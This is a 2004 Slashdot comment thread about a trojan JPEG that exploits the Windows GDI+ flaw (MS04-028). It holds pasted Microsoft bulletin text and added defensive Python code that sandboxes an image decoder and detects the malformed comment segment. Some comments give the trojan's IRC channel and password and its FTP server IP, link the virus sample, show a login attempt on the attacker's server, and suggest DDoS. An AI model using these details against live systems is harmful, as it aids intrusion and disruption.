First JPEG Virus Posted To Usenet
Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."
I want to see what GraphicConverter does with this.
One more reason not to look at that goatse picture!
I think I speak best when I say......
Pwnd
Usenet posts JPEG viruses to you!
Congrats, microsoft, for making just about every filetype unsafe.
The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.
autopr0n is like, down and stuff.
Hopefully not too many people get hit by this...
Meanwhile, I'm just happy I don't run windows at home!!
This exploit could also be used by inserting the code into certain applications that render JPEG images while running. Also, email worms that have JPEG images attached with the code could cause mass havoc. Glad I'm on OS X!
Here we go again... Hold on... woooooowww. :)
I hope I'm safe enough by not using many Microsoft apps, but I'm not sure about that. Sucks.
Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.
www.goatse.cx
Someone tell me, thats not a virus, is it?
This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.
I wish Snort had intrusion prevention capability. = wink wink=
Does this affect Firefox?
It was only a matter of time. Now we wait for a dozen variants to pop up.
"This could possibly be the worst viruses yet!"
Hm...maybe when he started typing there was only one and it spread during the sentence?
GOD SAVE THE PR0N :)
I guess those nude pictures of Anna Kournikova could indeed be a virus.
Virus writers should be dragged out in the street and... well, whatever.
The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.
I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.
What browsers are protected from the jpeg virus? I remember IE and some earlier versions of Mozilla being said to be vulnerable to this. This could be my incentive to upgrade Firedragon, or whatever they call it these days.
If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.
That's a feature (connecting to IRC), not a virus.
clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND
----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)
Also updated NAV Corp 8 with the latest defs (9/27/04) and it found it. AVG Free Edition doesn't as of yet.
I run at work.
:)
The joys of running a mac shop
Microsoft has released a *FREE* patch for customers, now available from their web site!
...your neighbour's open access point, a copy of Airpwn and a suitably infected JPEG. Sounds like a pretty nasty situation in the making to me.
No Screenshots, please!
My 12 year old Amiga 3000 is immune!
Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.
Foregone conclusion then.
There goes the neighborhood.
These could be the worst grammar too!!!
If you read through the actual posting, it is apparent that while this may be the first GDI/JPEG-based worm, it is certainly not going to be the worst. First of all, unless I missed it, this code does not even self-replicate (i.e. it doesn't mail itself to others, or post itself to Usenet, or otherwise exploit vulnerable systems). I would expect to see some script kiddies combine this proof-of-concept trojan with some social-engineering-type email worms, and then **THAT** will be a nasty worm.
Unprotected goatse.cx viewing can make you catch something nasty.
yes, if you haven't updated to the latest version.
See this Slashdot thread.
- Leo
put the image on doubleclick.net
Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.
I bet this sort of thing is a helluva lot more endemic than people realize.
If you are using Windoze, run ZoneAlarm from ZoneLabs. ;^) Every program that tries to access the internet in any way has to pass through this program and be okayed by you! Just click DENY and REMEMBER THIS SETTING. The software will still be installed but it can't get back to the LOSER who released it!
server: irc.p2pchat.net
channel: #FurQ
password: letmein
:) (and watch the bots join up)
Nice little informal gathering to talk about the virus
apparently, the text indicates, that's the only source for the installed files.
If, say, 500 of us were to log into that and stay connected, would we stop the virus? Would there be any risk to ourselves? (Giving your IP away, for a start.)
Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing plenty of guys asking for help getting this removed, after finding out pornstars aren't virus free after all.
Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with Blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket licence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from building to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.
Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip
Come on... admit it, you've all been dying for this Slashdot posting. You didn't think all this hype about the Microsoft GDI thing wasn't going to pay off? Well there you go.... feast on Microsoft's pain....
As stated in Re:That's pretty amazing. (a few posts up) it does not -- since Firefox is the latest Mozilla-based browser.
Anyone know if this exploit can be done when the user is using a Windows Limited account?
I suggest you people hold your tongues, and think before you blindly bash Microsoft all the time. Yes, there *ARE* OTHER good reasons to hate Microsoft, but that's beside the point, and I'd rather not get into that right now.
For the purposes of this discussion, suffice it to say that I think *BOTH* the Microsoft and open source communities have their fair share of exploits to deal with. For example, the Mozilla people have had to patch things like this before, too. In fact, need I also point out that a very similar potential exploit was also found recently in GdkPixBuf. So it ISN'T just Microsoft.
Before now, many of you were saying "we don't have as many exploits as Microsoft." Then finally, when similar exploits are found in open source, you people start rationalizing, and saying "Oh, okay, but our side still fixes things faster." That's what in logic we call "rationalization," and "shifting your reasons." I also bet that some of these same people also think our President is doing this on the reasons for invading Iraq (though please note I still support the President, though that's also beside the point.)
Saying "but open source allows people to see them more quickly, too" is also no argument. Certainly, one could say open source allows for greater transparency in the process, but on the other hand, I could also legitimately argue that allowing everyone to look for possible exploits in my code is like posting the blueprints for all my locks right out in the open, so every burglar can then look for ways to try to pick them or break them.
My point is basically this: I wish people would stop going to extremes, bashing Microsoft when any kind of security flaw hits, then trying to rationalize and talk down every similar flaw that is found in their favorite open source project.
I don't see any indication that it's a virus at all. Just that the jpeg installs remote admin tools, connects to IRC and other typical things.
How does it propagate?
Is it just me, or does the phrase "JPEG virus" not accurately describe where the vulnerability lies? This seems to me like it should be called a "Microsoft Windows virus".
Then again, perhaps prepending "Microsoft Windows" to "virus" is considered redundant.
FYI, here's the fix from M$ for this exploit: Security Bulletin
It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.
The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.
There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.
Hey! Any good programmer out there could just modify this virus so that it doesn't do anything "wrong"? I wanted it to change the Windows desktop picture to an image I'd post on my website that would read "Patch your system ASAP! You're owned!" (or any other 1337 h4x0r cliché). I'd post the infected file on my blog and wait for my friends to call me in fear that something worse could have happened, hehehehe!
Can somebody explain how this affects me? How can a picture be a virus? It looks like Notepad opening readme.txt and formatting your hard drive. And what viewers and browsers can do it? If I save it and double-click from the desktop explorer? Is it a picture or a viewer problem? If I use an old version of a browser or the 95 OS will it still create problems? If I use a firewall like ZA will that stop it? Any time I see these virus problems I never know. Of course whenever I do check my comp for problems with both an AV and spyware blocker it finds nothing. Of course I don't download willy-nilly.
Why don't you guys have friends or journals?
Why can't it just nuke the hard drive like the old virii did? Teach people a little about access levels and system patching.
[Since it seems to me it might be good for us all to collect as much information as possible in this thread ...]
PS: just for the hell of it, on a box that's not using one of the allegedly vulnerable versions of Windows or IE (it's NTWS SP6a, IE5.5), I tried to open the Easynews sample image using Irfanview V3.80, which displayed the error message :
I suppose I'd better run a full scan of my peecee anyway now ... sigh ... I wonder which JPEG library Irfanview uses ...
Although the SANS website says their scanner is written for Win2K+, it seems to run on NT (although the output format is a bit screwy), and it reckoned there is one vulnerable DLL, at
Dunno where that came from, but it describes itself as "Microsoft Vector Graphics Rendering (VML)", and - fascinatingly - the copyright says "Unpublished work. Copyright© Microsoft Corporation 1983-1999. All rights reserved."
Not in these parts...
Why doesn't slashdot allow you to post images! :)
Does this mean all those lonely college bachelors have to stop downloading porn until MS patches the hole?
Wasn't iLoveYou the worst virus ever? Or Stages? Or Melissa? Or Nimda? Or the "Good Times" virus? This one will fall into obscurity, too.
Use Evolution instead of Outlook? Bewa
Further proof that secure computing is not a firewall enabled by default. Secure computing is a well-rounded approach: design, code, implementation, and patching. And that's just the OS part, not the people part.
... I don't use Windows at home or at work.
Serves Windows users right for using Windows.
One more reason to use Linux!
I remember a web page once that had HTML that was known to crash certain versions of Internet Explorer. Some kind of buffer overflow diddling via HTML couldn't be that far off. Declarative protocols can clearly be full of holes also, not just executable content.
I'm anonymous for a reason. When I found out that this was in the wild I attempted to access the server. At first I was able to get in via FTP. I threw a couple of commands at the system, it responded but before I could explore enough to find out who was behind this the server logged me off and the password referred to in the text file from EasyNews stopped working.
DAMN.
Next time bitches, I will 0wn you!
Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.
What, now you can't even WATCH sex without protection?
In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.
In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.
Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?
i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
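The isolation design sketched in the post above (parser in a separate privilege domain, talking to the application over a pipe or socket), as an added example that is not code from the thread, from Windows or from any image library. It is Unix-only (`os.fork`, `resource`), and `_untrusted_decode` is a stand-in for a real decoder that can be told to crash with a constructed poison input; the memory and CPU limits are assumed values to tune per decoder.

```python
"""Run an untrusted decoder in a throwaway child process.

Added example of the privilege-isolation idea; not code from the thread,
from Windows or from any image library. Unix only (os.fork, resource).
`_untrusted_decode` is a stand-in for a real decoder and can be told to
crash with a constructed poison input.
"""
import os
import resource
import struct

RESULT_FMT = ">II"   # fixed-width (width, height) reply; no pickle, so a
                     # compromised child cannot smuggle objects back


def _untrusted_decode(blob):
    """Stand-in decoder: returns (width, height); aborts on b'CRASH'."""
    if blob == b"CRASH":
        os.abort()           # simulate a memory-corruption crash (SIGABRT)
    return len(blob), 1


def decode_isolated(blob, mem_limit=1 << 30, cpu_seconds=2):
    """Decode `blob` in a forked child; return (result, error).

    The child gets address-space and CPU limits (assumed defaults), never
    shares the parent's heap, and talks back only through a pipe carrying
    a fixed-format message. A crash or runaway in the decoder surfaces as
    an error string in the parent instead of taking the parent down.
    """
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:                         # child
        os.close(r)
        try:
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
            resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
            width, height = _untrusted_decode(blob)
            os.write(w, struct.pack(RESULT_FMT, width, height))
            os._exit(0)
        except BaseException:
            os._exit(1)
    os.close(w)                          # parent
    chunks = []
    while True:
        chunk = os.read(r, 4096)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(r)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return None, f"decoder killed by signal {os.WTERMSIG(status)}"
    reply = b"".join(chunks)
    if os.WEXITSTATUS(status) != 0 or len(reply) != struct.calcsize(RESULT_FMT):
        return None, "decoder exited without a valid result"
    return struct.unpack(RESULT_FMT, reply), None


if __name__ == "__main__":
    print(decode_isolated(b"\xff\xd8\xff\xd9"))   # constructed benign input
    print(decode_isolated(b"CRASH"))               # constructed poison input
```

The point of the fixed-format reply is that the child is the untrusted side once it has touched attacker-controlled bytes: anything richer than a few integers coming back over the pipe (a pickle, a pointer, a file handle) would hand the attacker a second parser to attack, this time in the privileged process.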
I had a look at the sample source code, and it's dated (if you can believe it) September 23 (i.e. 5 days ago).
What's happening here - is someone big-noting themselves, is it a mistake, or has it really been around this long?
I did upgrade to the latest version of Firefox and lost about half of my most useful extensions. Some I found later on the homepage sites, others are yet to be upgraded.
So here's the problem with a micro-browser that is feature-enhanced by extensions that you come to love and rely on. If there is a critical vulnerability, do you upgrade and be safe, but lose useful functionality, or do you risk it and wait until the extension builders catch up?
I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the Office Update page. Guess what: the Office Update page said there were no updates. So, apparently the system is vulnerable, but there is no way to fix it. Wonderful!
Once this JPEG overflowed GDI+, it phoned home ...
Will PC-based firewalls block the outbound connection?
I run AtGuard, which throws a popup anytime something makes an outbound connection. However, I have a rule to allow Firefox to make outbound connections. Would the virus run as Firefox when it strikes (in the event that I go surfing for JPGs of naked tranny beanie babies from easynews), or does it run as some system component of windows (which would be blocked since I disallow all netbios/system stuff except to self) ?
. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .
If there's no name yet, how about the Medusa virus?
So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?
Millions of instant zombies.
That's f*cking scary....
Microsoft Security Bulletin MS04-028
Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987)
Issued: September 14, 2004
Updated: September 21, 2004
Version: 1.2

Summary
Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components.
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Critical
Recommendation: Customers should apply the update immediately.
Security Update Replacement: None
Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information.

Tested Software and Security Update Download Locations:
Affected Software:
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987)
Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987)
Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987)
Microsoft Windows Server(TM) 2003 - Download the update (KB833987)
Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987)
Microsoft Office XP Service Pack 3 - Download the update (KB832332)
Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332)
Microsoft Office XP Software:
Outlook® 2002
Word 2002
Excel 2002
PowerPoint® 2002
FrontPage® 2002
Publisher 2002
Access 2002
Microsoft Office 2003 Software:
Outlook® 2003
Word 2003
Excel 2003
PowerPoint® 2003
FrontPage® 2003
Publisher 2003
Access 2003
InfoPath(TM) 2003
OneNote(TM) 2003
Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931)
Microsoft Project 2003 (all versions) - Download the update (KB838344)
Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932)
Microsoft Visio 2003 (all versions) - Download the update (KB838345)
Microsoft Visual Studio .NET 2002 - Download the update (KB830348)
Microsoft Visual Studio .NET 2002 Software:
Visual Basic .NET Standard 2002
Visual C# .NET Standard 2002
Visual C++ .NET Standard 2002
Microsoft Visual Studio .NET 2003 - Download the update (KB830348)
Microsoft Visual Studio .NET 2003 Software:
Visual Basic .NET Standard 2003
Visual C# .NET Standard 2003
Visual C++ .NET Standard 2003
Visual J# .NET Standard 2003
The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461)
Microsoft Picture It!® 2002 (all versions) - Download the update
Microsoft Greetings 2002 - Download the update
Microsoft Picture It! version 7.0 (all versions) - Download the update
Microsoft Digital Image Pro version 7.0 - Download the update
Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update
Microsoft Digital Image Pro version 9 - Download the update
Microsoft Digital Image Suite version 9 - Download the update
Microsoft Producer for Microsoft Office PowerPoint (all versions)
Microsoft Platform SDK Redistributable: GDI+ - Download the update
Office Users Note: Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office
It was Bug Month, not security, though that's related. It was in 2002. The shortest month, February.
... "It's time to get the garage cleaned out."
"We are not coding new code as of today for the next month," Richard Purcell, director of the Microsoft's corporate computing office
Which I thought was straight PR, and if there were any actual deferrals of project waypoints, this time would be spent dealing with personal inbox overloads.
But I did get contacted by a Microsoft engineer during that time, re a software failure I'd detailed online. {Nothing's been fixed, mind you.}
"Quality freefall"? Not really. They've always produced third-tier code. This is normal. The only difference right now is they're feeling more heat about it because programs can do more, and they've got competition they can't kill in Open Source. The profitability of their poor-quality approach is falling against these two rising variables. Quality itself has been steady state.
because i see a vulnerability in it..
... someone defaces a popular website with such an image. Imagine if someone replaced the main image on the worlds most popular search engine!
Or if someone posts such an image to an automatic image rating site (are they still popular? does hotornot still exist?)
Heard way too many horror stories about SP3 and decided not to take the chance (since SP2 killed my system and required a complete reinstall). Are there any standalone patches for SP2 available?
Oh, that's right, those toys that were extremely popular a few years ago, that suckers^Rconsumers were sometimes paying upwards of thousands of dollars to get some "rare" ones. Funny how things can be a huge fad one day, and completely forgotten the next.
Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.
members are seeing something, your seeing an ad
This looks like it could be the worst Windows virus to date. What is the easiest way to block this specific code from getting through a Linux NAT/firewall?
- how can I drop any packet containing a particular sequence of bytes?
- better: how would one do it at the TCP level so you catch it even if it spans more than one packet?
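A file-level check for the malformed segment behind MS04-028, as an added example rather than code from the thread, Easynews or any vendor. The documented trigger for the GDI+ bug is a JPEG marker segment whose 16-bit length field is 0 or 1: the length counts its own two bytes, the decoder computes `length - 2`, and the unsigned result wraps to a huge size that GDI+ then copied. The public sample used the COM (0xFFFE) comment marker, which is what the ClamAV name `Exploit.JPEG.Comment` shown earlier in the thread refers to. The sample bytes below are constructed for illustration, not the Easynews file.

```python
"""Scan a JPEG for the malformed comment segment behind MS04-028.

Added example; not code from the thread, Easynews or any vendor. The
trigger is a marker segment whose length field is 0 or 1: the decoder's
`length - 2` wraps to a huge unsigned value. The bytes at the bottom are
constructed samples.
"""
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that stand alone and carry no length field: SOI, EOI, TEM, RSTn.
NO_LENGTH = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))


def iter_segments(data):
    """Yield (marker, length_field, offset) for each segment up to SOS.

    Stops at SOS (entropy-coded data follows) and at any segment whose
    length field is below 2, because the file cannot be walked safely
    past that point; the caller already has the finding by then.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte before a marker
            pos += 1
            continue
        if marker in NO_LENGTH:
            yield marker, None, pos
            pos += 2
            if marker == EOI:
                return
            continue
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, length, pos
        if marker == SOS or length < 2:
            return
        pos += 2 + length


def find_bad_segments(data):
    """Return [(marker, length, offset)] for every length field below 2."""
    return [(m, n, off) for m, n, off in iter_segments(data)
            if n is not None and n < 2]


def is_ms04_028_trigger(data):
    """True when a COM segment declares a length of 0 or 1."""
    return any(m == COM for m, _, _ in find_bad_segments(data))


# Constructed samples (not real files): a benign 5-byte comment, and a
# comment segment declaring length 1 followed by filler where the payload
# would sit.
BENIGN = b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", 7) + b"hello" + b"\xff\xd9"
MALFORMED = b"\xff\xd8" + b"\xff\xfe" + b"\x00\x01" + b"\x90" * 16

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, find_bad_segments(blob), is_ms04_028_trigger(blob))
```

On the two questions in the post: a per-packet byte-sequence filter is the wrong layer, because the four bytes of the marker and its length can straddle a packet boundary and the same bytes appear legitimately in other files. This check needs the reassembled object, so the practical place to run it is a proxy or mail gateway that sees whole files, and `find_bad_segments` deliberately reports any marker with a sub-2 length rather than only COM, since the same arithmetic applies to every variable-length segment.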
I was talking with a friend on MSN... coincidentally after reading on this for about 2 hours. The first thing she said I found very suspicious: C3ly$c3 says: you there? ...http://www.xf2s.com/msn/wode.jpg.
err a jpeg surrounded by a bunch of other characters ... sounds suspicious
I don't know if this is actually the virus.... I'm on my laptop right now which runs Windows (unpatched of course).
I don't know about AIM, but MSN reencodes all images to PNG. I don't think there's going to be much risk from that.
-ReK
md5sum -c reality.md5
reality: FAILED
md5sum: WARNING: 1 of 1 computed checksum did NOT match
Microsoft should get with Google and other major internet sites and put up JPEGs that:
1) fix the hole by downloading/installing updates
2) turn on automatic updates
:)
for easynews...
AC
That'll fix it...
Oh well, what the hell...
I played with the sample code to crash a machine last Friday. That code produced a 2K JPEG. (Likely it was smaller but I'll bet 2K is the block size on my 80 GB hard drive. File is at work so I can't check it now.)
7K sounds very reasonable if all it has to do is download the real executables.
Technically, this is a Trojan Horse, not a virus.
is how far back IE (and Windows) is affected by this?
specifically versions and releases.
are stock 95, 98 and ME affected?
the irc channel has been slashdotted... thats new
Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.
LS
That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?
Apple really has come a long way around here, eh?
It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.
The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.
I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.
Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.
Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?
And some dorks still laugh at me and say I'm a paranoid conspiracy nut.
--Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!
Count on this: if any 'terrorism' happens in the next 5 weeks, you can be sure it will have been aided and abetted by the US and/or Israeli secret services.
Not that you'll be able to talk about it on-line, what with all the scary viruses and all!
Buckle up, kids. This stretch of road is about to get bumpy.
-FL
Much as I despise virus writers, frankly after having been forced to use Windows for the last few days, I hope this destroys the damn platform. I normally try and keep a neutral attitude to platform wars, but these last few days have really opened my eyes to just how bad Windows is. It sucks so bad, I simply cannot fathom why it is so popular. I normally use OS X, but idiosyncrasies aside, Windows designers truly seem to have no clue about what makes the difference between a productivity aid and a productivity hindrance. At every step some "feature" of Windows either doesn't work, or else does too much, requiring further steps to undo some of what it did. It cannot lay text out properly half the time. Its character mapping is totally broken, with different fonts having different character mappings. I could rant on....
Frankly, these viruses are great news for those of us who just want a bit more balance in the marketplace. I'm fed up with having to apologise for being a minority Mac user - fuck it, Macs let me get my work done, no fuss, no frustration, no stress, and no bad temper which makes me post rants to slashdot!! Windows users - piss off and call me back when your platform of "choice" is fixed. That's all.
It will trojan zillions of systems, leaving them open for all sorts of havoc.
Right before the US presidential election, a time when terrorists worldwide are feverishly searching for a huge American backdoor. Expect DDoS against the most "important" corporate servers.
All this thanks to programmers fuckingly stupid enough to use a low-enough level language that is rife with buffer overflows and to their managers for allowing them to turn-out such sloppy products.
Hopefully this will be the straw that breaks the camel's back, and will cause massive interrogation of the "wisdom" of using Microsoft products and raise the awareness about alternatives.
Does running the apps in a non-admin account solve this problem? Only admins can install new services, right?
....it's a posting to an adult newsgroup, the kind that renders little thumbnails of nasty, farm animal love and other things that must not be mentioned here.
it has no other way of spreading. you have to be either moronically inquisitive or a seriously wacked pervert to get infected with this "virus," b/c you'd have to either click on a link taking you there (and "she-males-love-it-up-the-@$$" from alt.binaries.multimedia.erotica.transsexuals" is not a best-seller) or you must be a total sicko.
...because you never know who you're dealing with.
Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:
GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability
Either update those apps so they don't have the problem anymore, or do not use the app.
I saw a weak outgoing attempt to 209.171.43.27, but nothing came back :-(
Better roll the ol' VMware snapshot back just in case.
im on my laptop right now which runs windows (unpatched of course) Of course? Uh, why?
no funny mods yet? no python fans?
Tell me again what Taco is paid for?
...at isc.sans.org (Internet Storm Center). Do not use the one from Microsoft. It *sucks*. Watch dshield (like a hawk). Read www.cert.org. Read "comp.risks" (Usenet).
and still lose too much time..
We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!
If you're behind any kind of firewall, and I know I'm saying *if*, then Remote Admin won't do you much good for remote connections unless you've got port 4899 open. If they are using a different port mapping in the registry file then it will conflict if you have another service running on that 'standard' port. Seems pretty bad to install an app like Remote Admin for that purpose.
For a Windows server to run it on. Plus more for additional client access licenses. Which is fine if you've already spent that money.
For the rest of us, grab WindowsUpdate Cache. Runs on Squid, the world's most popular proxy server.
http://shit.slashdot.org/article.pl?sid=04/09/27/2319222
Damn, I have wanted to get free radmin and winvnc software for so long. Finally I can download them from the FTP server where infected computers go to download the remote control apps...
argh no...
Connected to 209.171.43.27.
220 Ftp server ready.
User (209.171.43.27:(none)): bawz
331 User bawz okay, need password.
Password:
421 Sorry, someone is already logged in to this account.
Login failed.
hrm, being a developer who has used gdi+ before, it is not only for viewing jpegs. It does have a jpeg/gif etc viewing component to it. So just because an application uses gdiplus does not make it vulnerable. Picture viewers that depend on gdiplus (probably the built in one in winxp, word and other viewers that rely on gdiplus for jpeg viewing) are vulnerable.
I'm also curious to know if this virus works on winxp sp2. Wasn't all the fuss about sp2 the NX flag to prevent executions in case of buffer overflows?
Or does this virus only target the unclean?
did you forget to take your meds?
http://lynx.browser.org/
The MSN server surely has enough bandwidth for spamming service.
Of course, you're safe on older versions of Windows, regardless of browser, as long as you don't update IE. I knew there was a reason for adding Windows for Workgroups 3.11 to my existing setup. :)
or do you make the upgrade keep your settings, and keep the plugin format backwards compatible?
i hate pansy republicans
Google surely has the largest kiddie porn collection on the planet. Note the thumbnail images returned by the image search.
The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!
MSN reencodes all images to PNG
That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I mean seriously. Many of today's apps can still run on Windows 95, given the right tweaks. With a dual boot of 95 and NT, I really don't see much reason to "upgrade" any further, at least in the Windows world.
Apparently some anti-virus programs catch it, but we all know that not everyone running a windows system keeps up to date spam filters. And *many* of the email programs for windows will render images, even in a preview pane. This is a huge, huge problem.
So the virus first showed up here:
Newsgroups: alt.binaries.multimedia.erotica.transsexuals,alt.binaries.pictures.erotica.transexual,alt.binaries.pictures.erotica.transexual.action,alt.binaries.pictures.erotica.transsexual
Subject: (Shemale-loves it up the ass.jpg (1/1)] [1/1] - Shemale loves it up the ass
:-)
Serves the shemale-lovers right...
Beware: In C++, your friends can see your privates!
I'm sure that *this* time, MS's major customers will demand improvements! ...in other news, Moller will finally get his SkyCar to market, cold fusion will be proven true, and all the PHB's in the world will be canned and replaced by people with a clue.
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
From www.ijg.org. This library is very popular.
And if yes, are all application linking this library subject to the vulnerability?
If yes this will be a lot of work to update all applications.
In cyberspace nobody knows you're a cat!
It's up to the educated people to inform them then, or make the system safer. I've built several varieties of linux desktops, and for the most part the users have no idea what "root" is... as in the apps that need root access (Synaptic, apt scripts, etc) are run via sudo and everything else runs in the user level.
...that's a virus!
gone are my days of safe pr0n browsing....
Sure, the delivery mechanism is a little different, but this is just another of the 60,000+ Windows viruses running in the wild. Why is this news? Don't Windows inmates just check the same places and follow the same procedures every day?
--- For a good time mail uce@ftc.gov
unfortunately it's not quite that simple **points up**
If I recall there was an image handling vulnerability in Thunderbird 0.7.3. When that came to light I updated to 0.8. Unfortunately, 0.8 ships with a bug which means that in many cases, a basic POP3 email account can't be validated properly.
So... the current release of one of the flagship Free software projects doesn't work, but you can fix it by downgrading to an older version with a major vulnerability. Excellent!
I submitted a story on this problem to Slashdot but hey, who wants to discuss problems with Free stuff when there's always another cheap crack to make about Microsoft, eh?
they've added some value: wrote a script to pick up the first publically available exploit by mining their massive usenet feed. it's fair enough they should get some publicity of the "gee, these guys are switched on, they really know their usenet" type. props to them.
Surely someone could write an extension to Firefox to detect this and any other possible virii on-the-fly-as-it-is-being-loaded.
